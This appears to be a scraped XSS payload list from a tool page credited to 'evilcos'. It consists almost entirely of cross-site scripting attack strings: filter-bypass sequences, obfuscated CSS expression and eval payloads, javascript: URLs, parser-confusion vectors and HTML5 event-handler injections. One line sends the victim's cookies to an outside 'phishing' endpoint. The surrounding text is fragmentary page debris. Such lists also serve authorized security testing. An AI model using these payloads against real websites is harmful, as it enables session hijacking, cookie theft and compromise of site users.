>"' '';!--"=&{()} '';!--"=&{()} '';!--"=&{(alert(1))} `> HI '"><"' new Image().src="http://xssor.io/phishing/cookie.asp?cookie="+escape(document.cookie); body{xxx:expression(eval(String.fromCharCode(105,102,40,33,119,105,110,100,111,119,46,120,41,123,97,108,101,114,116,40,39,120,115,115,39,41,59,119,105,110,100,111,119,46,120,61,49,59,125)))} a{xxx:expression(if(!window.x){alert('xss');window.x=1;})} a{xxx:\65\78\70\72\65\73\73\69\6f\6e\28\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\27\78\73\73\27\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\3b\7d\29} body{background:url("javascript:alert('xss')")} body{background:url(JavAs cr ipt:alert(0))} @i\6d\70o\72\74'javascr\ipt:alert(document.cookie)';
alert(String(/xss/).substr(1,3)) alert(/xss/.source) Test x='\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)() Test Test
javascript:document.scripts[0].src='http://127.0.0.1/yy.js';void(0); Test javascript:document.cookie=window.prompt("edit cookie:",document.cookie);void(0);
  • XXX
    [!] ie only:
    x <!--[if]><script>alert(1)</script --> <!--[if<img src=x onerror=alert(1)//]> --> [!] parsing error: <!--<img src="--><img src=x onerror=alert(1)//"> <comment><img src="</comment><img src=x onerror=alert(1))//"> <![><img src="]><img src=x onerror=alert(1)//"> <style><img src="</style><img src=x onerror=alert(1)//"> <b <script>alert(1)</script>0 <x '="foo"><x foo='><img src=x onerror=alert(1)//'> [!] special tags parsing issues, from: http://html5sec.org/#html <? foo="><script>alert(1)</script>"> <! foo="><script>alert(1)</script>"> </ foo="><script>alert(1)</script>"> <? foo="><x foo='?><script>alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> <% foo><x foo="%><script>alert(1)</script>"> [!] fuzzing tips: <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> <a href=java script:alert(1)>XXX</a> [!] utf-7 bom +/v8 +/v9 +/v+ +/v/ [!] html5sec.org <svg/onload=alert(1)> <form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button> <video><source onerror="alert(1)"> <iframe srcdoc="<svg onload=alert(1)>⃒"></iframe> <frameset onload=alert(1)> <!--<img src="--><img src=x onerror=alert(1)//"> <style><img src="</style><img src=x onerror=alert(1)//"> <title><img src=" // by evilcos # Only Edge # Only Edge
    XSS'OR
    XSS'OR
    XSS'OR <img src="